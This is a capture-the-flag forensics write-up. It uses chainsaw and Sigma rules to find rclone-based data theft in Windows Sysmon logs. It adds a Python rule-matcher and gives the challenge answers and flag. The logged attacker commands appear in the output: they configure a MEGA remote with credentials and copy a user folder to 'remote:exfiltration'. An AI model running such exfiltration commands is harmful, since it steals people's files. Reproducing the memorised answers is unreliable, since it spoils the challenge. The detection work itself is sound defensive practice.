Packet Cyclone
11 minute read
We have this challenge description:
Pandora’s friend and partner, Wade, is the one that leads the investigation into the relic’s location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade’s research to the cloud. Using the tool called “chainsaw” and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.
And we are given these files:
$ tree
.
├── Logs
│ ├── Application.evtx
│ ├── HardwareEvents.evtx
│ ├── Internet Explorer.evtx
│ ├── Key Management Service.evtx
│ ├── Microsoft-Client-Licensing-Platform%4Admin.evtx
│ ├── Microsoft-Windows-AAD%4Operational.evtx
│ ├── Microsoft-Windows-AppModel-Runtime%4Admin.evtx
│ ├── Microsoft-Windows-AppReadiness%4Admin.evtx
│ ├── Microsoft-Windows-AppReadiness%4Operational.evtx
│ ├── Microsoft-Windows-AppXDeployment%4Operational.evtx
│ ├── Microsoft-Windows-AppXDeploymentServer%4Operational.evtx
│ ├── Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Inventory.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx
│ ├── Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx
│ ├── Microsoft-Windows-AppxPackaging%4Operational.evtx
│ ├── Microsoft-Windows-Audio%4CaptureMonitor.evtx
│ ├── Microsoft-Windows-Audio%4Operational.evtx
│ ├── Microsoft-Windows-Audio%4PlaybackManager.evtx
│ ├── Microsoft-Windows-Authentication User Interface%4Operational.evtx
│ ├── Microsoft-Windows-Biometrics%4Operational.evtx
│ ├── Microsoft-Windows-BitLocker%4BitLocker Management.evtx
│ ├── Microsoft-Windows-Bits-Client%4Operational.evtx
│ ├── Microsoft-Windows-CloudStore%4Operational.evtx
│ ├── Microsoft-Windows-CodeIntegrity%4Operational.evtx
│ ├── Microsoft-Windows-Containers-BindFlt%4Operational.evtx
│ ├── Microsoft-Windows-Containers-Wcifs%4Operational.evtx
│ ├── Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx
│ ├── Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx
│ ├── Microsoft-Windows-Crypto-DPAPI%4Operational.evtx
│ ├── Microsoft-Windows-Crypto-NCrypt%4Operational.evtx
│ ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx
│ ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx
│ ├── Microsoft-Windows-DeviceSetupManager%4Admin.evtx
│ ├── Microsoft-Windows-DeviceSetupManager%4Operational.evtx
│ ├── Microsoft-Windows-Dhcp-Client%4Admin.evtx
│ ├── Microsoft-Windows-Dhcpv6-Client%4Admin.evtx
│ ├── Microsoft-Windows-Diagnosis-DPS%4Operational.evtx
│ ├── Microsoft-Windows-Diagnosis-PLA%4Operational.evtx
│ ├── Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx
│ ├── Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx
│ ├── Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
│ ├── Microsoft-Windows-Diagnostics-Performance%4Operational.evtx
│ ├── Microsoft-Windows-DiskDiagnosticDataCollector%4Operational.evtx
│ ├── Microsoft-Windows-FileHistory-Core%4WHC.evtx
│ ├── Microsoft-Windows-GroupPolicy%4Operational.evtx
│ ├── Microsoft-Windows-HelloForBusiness%4Operational.evtx
│ ├── Microsoft-Windows-HotspotAuth%4Operational.evtx
│ ├── Microsoft-Windows-IKE%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-Boot%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-EventTracing%4Admin.evtx
│ ├── Microsoft-Windows-Kernel-PnP%4Configuration.evtx
│ ├── Microsoft-Windows-Kernel-PnP%4Driver Watchdog.evtx
│ ├── Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx
│ ├── Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-WHEA%4Errors.evtx
│ ├── Microsoft-Windows-Kernel-WHEA%4Operational.evtx
│ ├── Microsoft-Windows-Known Folders API Service.evtx
│ ├── Microsoft-Windows-LanguagePackSetup%4Operational.evtx
│ ├── Microsoft-Windows-LiveId%4Operational.evtx
│ ├── Microsoft-Windows-MUI%4Admin.evtx
│ ├── Microsoft-Windows-MUI%4Operational.evtx
│ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Admin.evtx
│ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx
│ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx
│ ├── Microsoft-Windows-NCSI%4Operational.evtx
│ ├── Microsoft-Windows-NetworkProfile%4Operational.evtx
│ ├── Microsoft-Windows-Ntfs%4Operational.evtx
│ ├── Microsoft-Windows-Ntfs%4WHC.evtx
│ ├── Microsoft-Windows-Partition%4Diagnostic.evtx
│ ├── Microsoft-Windows-PowerShell%4Admin.evtx
│ ├── Microsoft-Windows-PowerShell%4Operational.evtx
│ ├── Microsoft-Windows-Privacy-Auditing%4Operational.evtx
│ ├── Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx
│ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx
│ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4AutoPilot.evtx
│ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4ManagementService.evtx
│ ├── Microsoft-Windows-PushNotification-Platform%4Admin.evtx
│ ├── Microsoft-Windows-PushNotification-Platform%4Operational.evtx
│ ├── Microsoft-Windows-ReadyBoost%4Operational.evtx
│ ├── Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx
│ ├── Microsoft-Windows-RestartManager%4Operational.evtx
│ ├── Microsoft-Windows-SMBClient%4Operational.evtx
│ ├── Microsoft-Windows-SMBServer%4Audit.evtx
│ ├── Microsoft-Windows-SMBServer%4Connectivity.evtx
│ ├── Microsoft-Windows-SMBServer%4Operational.evtx
│ ├── Microsoft-Windows-SMBServer%4Security.evtx
│ ├── Microsoft-Windows-Security-Mitigations%4KernelMode.evtx
│ ├── Microsoft-Windows-Security-Mitigations%4UserMode.evtx
│ ├── Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx
│ ├── Microsoft-Windows-SettingSync%4Debug.evtx
│ ├── Microsoft-Windows-SettingSync%4Operational.evtx
│ ├── Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx
│ ├── Microsoft-Windows-Shell-Core%4ActionCenter.evtx
│ ├── Microsoft-Windows-Shell-Core%4AppDefaults.evtx
│ ├── Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx
│ ├── Microsoft-Windows-Shell-Core%4Operational.evtx
│ ├── Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx
│ ├── Microsoft-Windows-SmbClient%4Audit.evtx
│ ├── Microsoft-Windows-SmbClient%4Connectivity.evtx
│ ├── Microsoft-Windows-SmbClient%4Security.evtx
│ ├── Microsoft-Windows-StateRepository%4Operational.evtx
│ ├── Microsoft-Windows-StateRepository%4Restricted.evtx
│ ├── Microsoft-Windows-Storage-Storport%4Health.evtx
│ ├── Microsoft-Windows-Storage-Storport%4Operational.evtx
│ ├── Microsoft-Windows-StorageSpaces-Driver%4Diagnostic.evtx
│ ├── Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx
│ ├── Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx
│ ├── Microsoft-Windows-Store%4Operational.evtx
│ ├── Microsoft-Windows-Storsvc%4Diagnostic.evtx
│ ├── Microsoft-Windows-Sysmon%4Operational.evtx
│ ├── Microsoft-Windows-TWinUI%4Operational.evtx
│ ├── Microsoft-Windows-TZSync%4Operational.evtx
│ ├── Microsoft-Windows-TaskScheduler%4Maintenance.evtx
│ ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx
│ ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
│ ├── Microsoft-Windows-Time-Service%4Operational.evtx
│ ├── Microsoft-Windows-UAC%4Operational.evtx
│ ├── Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx
│ ├── Microsoft-Windows-User Device Registration%4Admin.evtx
│ ├── Microsoft-Windows-User Profile Service%4Operational.evtx
│ ├── Microsoft-Windows-UserPnp%4ActionCenter.evtx
│ ├── Microsoft-Windows-UserPnp%4DeviceInstall.evtx
│ ├── Microsoft-Windows-VPN%4Operational.evtx
│ ├── Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx
│ ├── Microsoft-Windows-WER-PayloadHealth%4Operational.evtx
│ ├── Microsoft-Windows-WFP%4Operational.evtx
│ ├── Microsoft-Windows-WMI-Activity%4Operational.evtx
│ ├── Microsoft-Windows-Wcmsvc%4Operational.evtx
│ ├── Microsoft-Windows-WebAuthN%4Operational.evtx
│ ├── Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx
│ ├── Microsoft-Windows-WinRM%4Operational.evtx
│ ├── Microsoft-Windows-Windows Defender%4Operational.evtx
│ ├── Microsoft-Windows-Windows Defender%4WHC.evtx
│ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx
│ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx
│ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx
│ ├── Microsoft-Windows-WindowsBackup%4ActionCenter.evtx
│ ├── Microsoft-Windows-WindowsSystemAssessmentTool%4Operational.evtx
│ ├── Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
│ ├── Microsoft-Windows-Winlogon%4Operational.evtx
│ ├── Microsoft-Windows-WorkFolders%4WHC.evtx
│ ├── Security.evtx
│ ├── Setup.evtx
│ ├── System.evtx
│ └── Windows PowerShell.evtx
└── sigma_rules
├── rclone_config_creation.yaml
└── rclone_execution.yaml
3 directories, 151 files
Understanding the challenge
The challenge is about Rclone, a command-line tool for managing files on cloud storage. We are given many EVTX files, which are Windows event logs. We also have some Sigma rules; Sigma is a generic, open signature format that lets you describe relevant log events in a straightforward way.
The challenge description mentions chainsaw. This tool takes the Windows EVTX files and the Sigma rules and uses them to find indicators of compromise (IoC). Because Sigma rules use generic field names, chainsaw needs a mapping file (passed with --mapping) that translates those names onto the EVTX event structure.
Indicators of compromise
Let's run chainsaw:
$ wget -q https://github.com/WithSecureLabs/chainsaw/releases/download/v2.6.0/chainsaw_x86_64-unknown-linux-gnu.tar.gz
$ tar xvfz chainsaw_x86_64-unknown-linux-gnu.tar.gz
x chainsaw/LICENCE
x chainsaw/README.md
x chainsaw/chainsaw
x chainsaw/mappings/
x chainsaw/mappings/sigma-event-logs-all.yml
x chainsaw/mappings/sigma-mft-logs-all.yml
x chainsaw/mappings/sigma-event-logs-legacy.yml
$ ./chainsaw/chainsaw
Rapidly work with Forensic Artefacts
Usage: chainsaw [OPTIONS] <COMMAND>
Commands:
dump Dump an artefact into a different format
hunt Hunt through artefacts using detection rules for threat detection
lint Lint provided rules to ensure that they load correctly
search Search through forensic artefacts for keywords
analyse Perform various analyses on artifacts
help Print this message or the help of the given subcommand(s)
Options:
--no-banner Hide Chainsaw's banner
--num-threads <NUM_THREADS> Limit the thread number (default: num of CPUs)
-h, --help Print help
-V, --version Print version
Examples:
Hunt with Sigma and Chainsaw Rules:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/
Hunt with Sigma rules and output in JSON:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml --json
Search for the case-insensitive word 'mimikatz':
./chainsaw search mimikatz -i evtx_attack_samples/
Search for PowerShell Script Block Events (EventID 4104):
./chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/
$ ./chainsaw/chainsaw hunt --sigma sigma_rules/ --mapping chainsaw/mappings/sigma-event-logs-all.yml Logs/
██████╗██╗ ██╗ █████╗ ██╗███╗ ██╗███████╗ █████╗ ██╗ ██╗
██╔════╝██║ ██║██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║
██║ ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║ ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║ ██║██║ ██║██║██║ ╚████║███████║██║ ██║╚███╔███╔╝
╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝
By Countercept (@FranticTyping, @AlexKornitzer)
[+] Loading detection rules from: sigma_rules/
[+] Loaded 2 detection rules
[+] Loading forensic artefacts from: Logs/ (extensions: .evtx, .evt)
[+] Loaded 149 forensic artefacts (54.3 MB)
[+] Hunting: [========================================] 149/149
[+] Group: Sigma
┌─────────────────────┬────────────────────────────┬───────┬──────────────────────────┬──────────┬───────────┬─────────────────┬────────────────────────────────┐
│ timestamp │ detections │ count │ Event.System.Provider │ Event ID │ Record ID │ Computer │ Event Data │
├─────────────────────┼────────────────────────────┼───────┼──────────────────────────┼──────────┼───────────┼─────────────────┼────────────────────────────────┤
│ 2023-02-24 15:35:07 │ ‣ Rclone Execution via │ 1 │ Microsoft-Windows-Sysmon │ 1 │ 76 │ DESKTOP-UTDHED2 │ CommandLine: '"C:\Users\wade\A │
│ │ Command Line or PowerShell │ │ │ │ │ │ ppData\Local\Temp\rclone-v1.61 │
│ │ │ │ │ │ │ │ .1-windows-amd64\rclone.exe" c │
│ │ │ │ │ │ │ │ onfig create remote mega user │
│ │ │ │ │ │ │ │ majmeret@protonmail.com pass F │
│ │ │ │ │ │ │ │ BMeavdiaFZbWzpMqIVhJCGXZ5XXZI1 │
│ │ │ │ │ │ │ │ qsU3EjhoKQw0rEoQqHyI' │
│ │ │ │ │ │ │ │ Company: https://rclone.org │
│ │ │ │ │ │ │ │ CurrentDirectory: C:\Users\wad │
│ │ │ │ │ │ │ │ e\AppData\Local\Temp\rclone-v1 │
│ │ │ │ │ │ │ │ .61.1-windows-amd64\ │
│ │ │ │ │ │ │ │ Description: Rsync for cloud s │
│ │ │ │ │ │ │ │ torage │
│ │ │ │ │ │ │ │ FileVersion: 1.61.1 │
│ │ │ │ │ │ │ │ Hashes: SHA256=E94901809FF7CC5 │
│ │ │ │ │ │ │ │ 168C1E857D4AC9CBB339CA1F6E21DC │
│ │ │ │ │ │ │ │ CE95DFB8E28DF799961 │
│ │ │ │ │ │ │ │ Image: C:\Users\wade\AppData\L │
│ │ │ │ │ │ │ │ ocal\Temp\rclone-v1.61.1-windo │
│ │ │ │ │ │ │ │ ws-amd64\rclone.exe │
│ │ │ │ │ │ │ │ IntegrityLevel: Medium │
│ │ │ │ │ │ │ │ LogonGuid: 10DA3E43-D892-63F8- │
│ │ │ │ │ │ │ │ 4B6D-030000000000 │
│ │ │ │ │ │ │ │ LogonId: '0x36d4b' │
│ │ │ │ │ │ │ │ OriginalFileName: rclone.exe │
│ │ │ │ │ │ │ │ ParentCommandLine: '"C:\Window │
│ │ │ │ │ │ │ │ s\System32\WindowsPowerShell\v │
│ │ │ │ │ │ │ │ 1.0\powershell.exe" ' │
│ │ │ │ │ │ │ │ ParentImage: C:\Windows\System │
│ │ │ │ │ │ │ │ 32\WindowsPowerShell\v1.0\powe │
│ │ │ │ │ │ │ │ rshell.exe │
│ │ │ │ │ │ │ │ ParentProcessGuid: 10DA3E43-D8 │
│ │ │ │ │ │ │ │ D2-63F8-9B00-000000000900 │
│ │ │ │ │ │ │ │ ParentProcessId: 5888 │
│ │ │ │ │ │ │ │ ParentUser: DESKTOP-UTDHED2\wa │
│ │ │ │ │ │ │ │ de │
│ │ │ │ │ │ │ │ ProcessGuid: 10DA3E43-D92B-63F │
│ │ │ │ │ │ │ │ 8-B100-000000000900 │
│ │ │ │ │ │ │ │ ProcessId: 3820 │
│ │ │ │ │ │ │ │ Product: Rclone │
│ │ │ │ │ │ │ │ RuleName: '-' │
│ │ │ │ │ │ │ │ TerminalSessionId: 1 │
│ │ │ │ │ │ │ │ User: DESKTOP-UTDHED2\wade │
│ │ │ │ │ │ │ │ UtcTime: 2023-02-24 15:35:07.3 │
│ │ │ │ │ │ │ │ 36 │
├─────────────────────┼────────────────────────────┼───────┼──────────────────────────┼──────────┼───────────┼─────────────────┼────────────────────────────────┤
│ 2023-02-24 15:35:17 │ ‣ Rclone Execution via │ 1 │ Microsoft-Windows-Sysmon │ 1 │ 78 │ DESKTOP-UTDHED2 │ CommandLine: '"C:\Users\wade\A │
│ │ Command Line or PowerShell │ │ │ │ │ │ ppData\Local\Temp\rclone-v1.61 │
│ │ │ │ │ │ │ │ .1-windows-amd64\rclone.exe" c │
│ │ │ │ │ │ │ │ opy C:\Users\Wade\Desktop\Reli │
│ │ │ │ │ │ │ │ c_location\ remote:exfiltratio │
│ │ │ │ │ │ │ │ n -v' │
│ │ │ │ │ │ │ │ Company: https://rclone.org │
│ │ │ │ │ │ │ │ CurrentDirectory: C:\Users\wad │
│ │ │ │ │ │ │ │ e\AppData\Local\Temp\rclone-v1 │
│ │ │ │ │ │ │ │ .61.1-windows-amd64\ │
│ │ │ │ │ │ │ │ Description: Rsync for cloud s │
│ │ │ │ │ │ │ │ torage │
│ │ │ │ │ │ │ │ FileVersion: 1.61.1 │
│ │ │ │ │ │ │ │ Hashes: SHA256=E94901809FF7CC5 │
│ │ │ │ │ │ │ │ 168C1E857D4AC9CBB339CA1F6E21DC │
│ │ │ │ │ │ │ │ CE95DFB8E28DF799961 │
│ │ │ │ │ │ │ │ Image: C:\Users\wade\AppData\L │
│ │ │ │ │ │ │ │ ocal\Temp\rclone-v1.61.1-windo │
│ │ │ │ │ │ │ │ ws-amd64\rclone.exe │
│ │ │ │ │ │ │ │ IntegrityLevel: Medium │
│ │ │ │ │ │ │ │ LogonGuid: 10DA3E43-D892-63F8- │
│ │ │ │ │ │ │ │ 4B6D-030000000000 │
│ │ │ │ │ │ │ │ LogonId: '0x36d4b' │
│ │ │ │ │ │ │ │ OriginalFileName: rclone.exe │
│ │ │ │ │ │ │ │ ParentCommandLine: '"C:\Window │
│ │ │ │ │ │ │ │ s\System32\WindowsPowerShell\v │
│ │ │ │ │ │ │ │ 1.0\powershell.exe" ' │
│ │ │ │ │ │ │ │ ParentImage: C:\Windows\System │
│ │ │ │ │ │ │ │ 32\WindowsPowerShell\v1.0\powe │
│ │ │ │ │ │ │ │ rshell.exe │
│ │ │ │ │ │ │ │ ParentProcessGuid: 10DA3E43-D8 │
│ │ │ │ │ │ │ │ D2-63F8-9B00-000000000900 │
│ │ │ │ │ │ │ │ ParentProcessId: 5888 │
│ │ │ │ │ │ │ │ ParentUser: DESKTOP-UTDHED2\wa │
│ │ │ │ │ │ │ │ de │
│ │ │ │ │ │ │ │ ProcessGuid: 10DA3E43-D935-63F │
│ │ │ │ │ │ │ │ 8-B200-000000000900 │
│ │ │ │ │ │ │ │ ProcessId: 5116 │
│ │ │ │ │ │ │ │ Product: Rclone │
│ │ │ │ │ │ │ │ RuleName: '-' │
│ │ │ │ │ │ │ │ TerminalSessionId: 1 │
│ │ │ │ │ │ │ │ User: DESKTOP-UTDHED2\wade │
│ │ │ │ │ │ │ │ UtcTime: 2023-02-24 15:35:17.5 │
│ │ │ │ │ │ │ │ 16 │
└─────────────────────┴────────────────────────────┴───────┴──────────────────────────┴──────────┴───────────┴─────────────────┴────────────────────────────────┘
[+] 2 Detections found on 2 documents
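What chainsaw did above is evaluate Sigma rules over EVTX records and print the matching events. The following is an added example written for this write-up; it is not chainsaw's code and not the rclone_execution.yaml / rclone_config_creation.yaml rules from the challenge (their contents are not shown on this page). It implements a minimal Sigma-style matcher (named selections, field modifiers, an and/or condition) over Sysmon Event ID 1 records constructed from the fields in the table above, then parses the rclone command lines to pull out the answers the questions in the Solution section ask for. The two rules, their titles, and the benign notepad record are assumptions made for the example.

```python
"""Minimal Sigma-style matcher plus rclone command-line parser (added example)."""
import shlex

RCLONE_EXE = r"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed Sysmon process-creation records (Event ID 1), trimmed to the fields
# the rules and the parser need. Records 76 and 78 copy the values from the
# chainsaw table; record 80 is benign noise invented to show the rules stay quiet.
EVENTS = [
    {"EventID": 1, "RecordID": 76, "ProcessId": 3820, "Image": RCLONE_EXE,
     "OriginalFileName": "rclone.exe", "Description": "Rsync for cloud storage",
     "ParentImage": POWERSHELL,
     "CommandLine": f'"{RCLONE_EXE}" config create remote mega user '
                    'majmeret@protonmail.com pass '
                    'FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI'},
    {"EventID": 1, "RecordID": 78, "ProcessId": 5116, "Image": RCLONE_EXE,
     "OriginalFileName": "rclone.exe", "Description": "Rsync for cloud storage",
     "ParentImage": POWERSHELL,
     "CommandLine": f'"{RCLONE_EXE}" copy '
                    r'C:\Users\Wade\Desktop\Relic_location\ remote:exfiltration -v'},
    {"EventID": 1, "RecordID": 80, "ProcessId": 4242,
     "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "Description": "Notepad", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\wade\notes.txt'},
]

# Hypothetical rules in Sigma layout (selections + condition). They are NOT the
# rules shipped with the challenge; the titles are ours.
RULES = [
    {"title": "Rclone Execution via Command Line or PowerShell",
     "detection": {
         "selection_img": {"Image|endswith": r"\rclone.exe"},
         "selection_meta": {"OriginalFileName": "rclone.exe",
                            "Description": "Rsync for cloud storage"},
         "selection_cli": {"CommandLine|contains": [" copy ", " sync ", " move ",
                                                    " config ", " lsd ", "--config "]}},
     # Supported Sigma subset: "or" of "and"-clauses, no parentheses, no "not".
     "condition": "selection_img and selection_cli or selection_meta and selection_cli"},
    {"title": "Rclone Remote Created With Inline Credentials",
     "detection": {
         "selection_img": {"Image|endswith": r"\rclone.exe"},
         "selection_cli": {"CommandLine|contains": " config create "},
         "selection_secret": {"CommandLine|contains": [" pass ", " token ", " key "]}},
     "condition": "selection_img and selection_cli and selection_secret"},
]

TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}


def _field_matches(event, key, wanted):
    """One Sigma field test: 'Field|modifier' key, list value means any-of,
    comparison case-insensitive as in Sigma."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    for w in (wanted if isinstance(wanted, list) else [wanted]):
        w = str(w).lower()
        if (modifier == "contains" and w in value) or \
           (modifier == "endswith" and value.endswith(w)) or \
           (modifier == "startswith" and value.startswith(w)) or \
           (modifier == "" and value == w):
            return True
    return False


def rule_matches(rule, event):
    """All fields of a selection must match; clauses joined by 'or', selections
    inside a clause joined by 'and'."""
    results = {name: all(_field_matches(event, k, v) for k, v in sel.items())
               for name, sel in rule["detection"].items()}
    return any(all(results[n.strip()] for n in clause.split(" and "))
               for clause in rule["condition"].split(" or "))


def hunt(events, rules=RULES):
    """chainsaw-hunt style pass: every (RecordID, rule title) pair that fires."""
    return [(ev["RecordID"], r["title"])
            for ev in events for r in rules if rule_matches(r, ev)]


def parse_rclone_cmdline(cmdline):
    """Split an rclone command line into the pieces the questions ask about.
    posix=False keeps Windows backslashes literal; quotes are stripped by hand."""
    argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    verb = argv[1] if len(argv) > 1 else ""
    if verb == "config" and argv[2:3] == ["create"] and len(argv) >= 5:
        # rclone config create <name> <type> [<key> <value>]...
        opts = argv[5:]
        return {"verb": "config create", "remote": argv[3], "provider": argv[4],
                "options": dict(zip(opts[0::2], opts[1::2]))}
    if verb in TRANSFER_VERBS:
        positional = [a for a in argv[2:] if not a.startswith("-")]
        src, dst = positional[0], positional[1]
        remote, _, path = dst.partition(":")   # "remote:exfiltration"
        return {"verb": verb, "source": src.rstrip("\\"),
                "dest_remote": remote, "dest_path": path}
    return {"verb": verb}


def extract_answers(events, rules=RULES):
    """Parse only the records some rule flagged and collect the challenge answers."""
    flagged = {rid for rid, _ in hunt(events, rules)}
    answers = {}
    for ev in events:
        if ev["RecordID"] not in flagged:
            continue
        parsed = parse_rclone_cmdline(ev["CommandLine"])
        if parsed["verb"] == "config create":
            answers.update(email=parsed["options"].get("user"),
                           password=parsed["options"].get("pass"),
                           provider=parsed["provider"], config_pid=ev["ProcessId"])
        elif parsed["verb"] in TRANSFER_VERBS:
            answers.update(exfiltrated_folder=parsed["source"],
                           destination_folder=parsed["dest_path"])
    return answers


if __name__ == "__main__":
    for record_id, title in hunt(EVENTS):
        print(f"record {record_id}: {title}")
    for key, val in extract_answers(EVENTS).items():
        print(f"{key}: {val}")
```

Running the script lists the two rclone records with the rule titles that fired (the notepad record stays silent) and prints the email, password, provider, configuring PID, source folder and destination folder. The parser works on the same principle a detection engineer uses when writing a real rule: rclone takes credentials as positional `user`/`pass` pairs on the command line, so a Sysmon process-creation event captures them in clear text.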
Solution
Now we can connect to the remote instance and answer the questions (all the information needed appears in the table above):
$ nc 157.245.38.221 32724
+----------------+-------------------------------------------------------------------------------+
| Title | Description |
+----------------+-------------------------------------------------------------------------------+
| Packet Cyclone | Pandora's friend and partner, Wade, is the one that leads |
| | the investigation into the relic's location. |
| | Recently, he noticed some weird traffic coming from his host. |
| | That led him to believe that his host was compromised. |
| | After a quick investigation, his fear was confirmed. Pandora tries now to see |
| | if the attacker caused the suspicious traffic during the exfiltration phase. |
| | Pandora believes that the malicious actor used rclone |
| | to exfiltrate Wade's research to the cloud. |
| | Using the tool chainsaw and many sigma rules that can be found online, |
| | can you detect the usage of rclone from the event logs produced by Sysmon? |
| | To get the flag, you need to start and connect |
| | to the docker service and answer all the questions correctly. |
+----------------+-------------------------------------------------------------------------------+
What is the email of the attacker used for the exfiltration process? (for example: name@email.com)
> majmeret@protonmail.com
[+] Correct!
What is the password of the attacker used for the exfiltration process? (for example: password123)
> FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI
[+] Correct!
What is the Cloud storage provider used by the attacker? (for example: cloud)
> mega
[+] Correct!
What is the ID of the process used by the attackers to configure their tool? (for example: 1337)
> 3820
[+] Correct!
What is the name of the folder the attacker exfiltrated; provide the full path. (for example: C:\Users\user\folder)
> C:\Users\Wade\Desktop\Relic_location
[+] Correct!
What is the name of the folder the attacker exfiltrated the files to? (for example: exfil_folder)
> exfiltration
[+] Correct!
Flag
And here is the flag:
[+] Here is the flag: HTB{Rcl0n3_1s_n0t_s0_inn0c3nt_4ft3r_4ll}